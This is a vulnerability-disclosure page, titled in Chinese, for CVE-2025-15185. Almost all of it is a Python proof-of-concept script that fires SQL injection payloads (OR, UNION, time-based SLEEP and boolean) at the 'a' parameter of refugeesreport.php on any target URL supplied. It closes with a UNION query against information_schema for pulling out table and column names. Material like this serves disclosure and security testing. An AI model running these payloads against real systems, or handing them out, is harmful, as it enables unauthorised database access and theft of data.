CVE-2025-15185: Refugee Food Management System 1.0 SQL注入漏洞

import requests import sys # CVE-2025-15185 SQL Injection PoC # Target: Refugee Food Management System 1.0 # Vulnerable File: /home/refugeesreport.php # Vulnerable Parameter: a def test_vulnerability(target_url): """Test if target is vulnerable to SQL injection""" # Basic injection test - causes SQL error vulnerable_endpoint = f"{target_url}/home/refugeesreport.php" # Test payloads payloads = [ "a' OR '1'='1", # Basic OR injection "a' UNION SELECT 1,2,3--", # UNION-based injection "a' AND SLEEP(5)--", # Time-based blind injection "a' AND 1=1--", # Boolean-based injection (true) "a' AND 1=2--" # Boolean-based injection (false) ] print(f"[*] Testing target: {vulnerable_endpoint}") print("=" * 60) for i, payload in enumerate(payloads, 1): try: params = {'a': payload} response = requests.get(vulnerable_endpoint, params=params, timeout=10) print(f"\n[Payload {i}] {payload}") print(f"Status Code: {response.status_code}") print(f"Response Length: {len(response.text)}") # Check for SQL error indicators sql_errors = ['mysql', 'sql', 'syntax', 'warning', 'error in your sql'] if any(err.lower() in response.text.lower() for err in sql_errors): print("[!] Potential SQL error detected - target may be vulnerable") except requests.exceptions.Timeout: print(f"[!] Request timeout - possible time-based blind injection") except Exception as e: print(f"[!] Error: {str(e)}") print("\n[*] Manual verification recommended") print("[*] Try extracting data with: a' UNION SELECT table_name,column_name FROM information_schema.columns--") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-15185.py <target_url>") print("Example: python cve-2025-15185.py http://vulnerable-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') test_vulnerability(target)